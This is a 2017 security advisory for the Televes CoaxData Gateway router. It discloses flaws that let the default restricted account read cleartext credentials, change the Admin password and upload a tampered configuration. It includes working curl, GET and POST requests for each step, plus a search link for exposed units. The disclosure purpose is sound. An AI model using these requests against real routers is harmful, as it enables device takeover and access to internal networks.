-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathTeleves_CoaxData_Gateway_en.txt
199 lines (109 loc) · 6.99 KB
/
Televes_CoaxData_Gateway_en.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
===============================
- Advisory -
===============================
Tittle: Televes COAXDATA GATEWAY 1Gbps - Priv Escalation
Risk: High
Date: 19.Jul.2017
Author: Pedro Andujar (Tarlogic)
Twitter: @pandujar
.: [ INTRO ] :.
Televes COAXDATA GATEWAY 1Gbps it is a router+WiFI device used by both, end-user and professional Internet Services
providers. According to the manufacturer:
"The CoaxData system enables the use of coaxial, PLC or fibre optics networks to distribute Internet services
to a certain number of points, providing a non-invasive distribution system that preserves the quality of the transmission.
CoaxData Home WiFi (ref. 769301) transforms the data signal distributed by the coaxial system in a wireless signal
through an Ethernet interface gateway or "Low Power WiFi". Also it can be configured as a router and/ or Access Point."
This device is widely used by WiMAX providers, Rural Internet access, etc ... mostly in Spain,
Austria and Portugal..
.: [ TECHNICAL DESCRIPTION ] :.
Televes COAXDATA gateway contains two default users, (Admin) to manage the device using either Web or ssh, and
a restricted one (username) with access to more basic features (local network only and WiFi).
Several ways have been identified that allow the restricted user to acquire or modify the password of the Administrator,
obtaining therefore access to the rest of credentials and being able to get root access to the underlying operating system
BusyBox, from where you can take full control of the device.
It has been proven that a large number of these devices are exposed on the internet, and they only change the administrator
password, leaving by default the restricted account (username / 123456), which allows with the issues described here, to gain
full control of the device and allowing access to other devices of the subdyacent internal network.
https://www.censys.io/ipv4?q=Televes+CoaxData+Wifi
Ref.769301 CoaxData 1Gbps-HDTV Coax+Wifi
doc-wifi-hgw_v1.02.0014 2016-02-02-14:01 - CD Firmware Version 4.20
.: [ ISSUE #1 ]:.
Name: Backup Containing cleartext credentials is accessible by restricted user
Severity: High
CVE: CVE-2017-6532
This issue is in fact two, first one related to the lack of encryption when storing the user provided credentials wthin the
configuration file, second one regarding the lack of access control to the backup file that should be restricted to admin user.
This way after logging in with the default "username" credentials, you will only need to access the URL shown below, in order to
find cleartext users and passwords of WiFI, WPS pin value, WAN (internet provider) and the device Admin account:
pandujar@fogheaven:~$ curl http://192.168.2.1/mib.db | grep -i Password
InternetGatewayDevice.DeviceInfo.X_ATH-COM_TeleComAccount.Password -m 1 -d Changeme1 (Admin password)
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.Password -m 1 -d Changeme2 (ISP Password)
InternetGatewayDevice.X_ATH-COM_Account.UserPassword -m 1 -d 123456 (username password)
.: [ ISSUE #2 ]:.
Name: Arbitrary password change
Severity: High
CVE: CVE-2017-6530
This is once more related to insufficient access control and checks performed on the client side. Once logged in as the restricted user,
we can modify the Admin user password using the following request:
http://192.168.2.1/password.shtml?DeviceInfo.X_ATH-COM_TeleComAccount.Password=hax0rcito
In fact, the password change form, actually allows to modify any other property of the device configuration, for instance it would also
allow to Enable SNMP:
http://192.168.2.1/password.shtml?DoCSnmpAgent.Enable=1
.: [ ISSUE #3 ]:.
Name: Unrestricted backup restore
Severity: High
CVE: CVE-2017-6531
The restoring backup and restart features lacks of access control, so the restricted user could modify the configuration
by setting the credentials of his choice taking advantate of this functionality:
POST /ReadFile.cgi HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.2.1/resetrouter.shtml?DeviceInfo.AdditionalConfigVersion=default_cfg_v1.02.0014
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------66789582480853432558488077
Content-Length: 42533
-----------------------------66789582480853432558488077
Content-Disposition: form-data; name="cfgfile"; filename="s"
Content-Type: application/octet-stream
InternetGatewayDevice.DeviceInfo.X_ATH-COM_TeleComAccount.Password -m 1 -d !dSR4ever
-----------------------------66789582480853432558488077
Content-Disposition: form-data; name="LoadCfgFile"
Load
-----------------------------66789582480853432558488077--
Then performing the following request:
http://192.168.2.1/result.shtml?method=LoadCfgFile&result=0&cfgfile=/tmp/s1488261988
And finally rebooting the device:
http://192.168.2.1/result.shtml?method=Reboot
.: [ ISSUE #4 ]:.
Name: Credentials sent by querystring
Severity: Low
Both, when logging in and changing password, credentials are passed through GET request (querystring), therefore they are cached
in the browsing history causing them to potentially been revealed by accident:
http://192.168.2.1/login?username=Admin&password=XXxXXXXxxX
.: [ ISSUE #5 ]:.
Name: Weak session mechanism, based on source ip
Severity: Medium
After performing the authentication process no token or cookies are assigned to the client browser, but the server would recognize the user based
to its source ip address. With this mechanism, if a user is authenticated through internet, anyone who shares his browsing ip (ex: corporate proxies),
would has access to the device with the very same account of the legitimate user.
.: [ CHANGELOG ] :.
* 19/Feb/2017: - Vulns found.
* 27/Feb/2017: - Manufacturer contacted through their contact web-form.
* 28/Feb/2017: - Technical details sent on a 2nd contact attempt.
* 01/Mar/2017: - Manufacturer acknowledge the issues and stats that restricted user would be removed from future releases.
* 13/Jul/2017: - Follow up email related to resolution. No response.
* 20/Jul/2017: - Public Disclosure.
.: [ SOLUTIONS ] :.
It is recommended as a preventive measure to change the user name and password of the restricted user that comes by default, in addition to
block the administration web interface and SSH on the internet or untrusted networks.
.: [ REFERENCES ] :.
[+] COAXDATA GATEWAY 1Gbps
http://www.televes.es/en/catalogo/producto/coaxdata-gateway-1gbps
[+] Televes About US
http://www.televes.es/en/empresa/aboutus
[+] Tarlogic Security S.L.
http://www.tarlogic.com/
-=EOF=-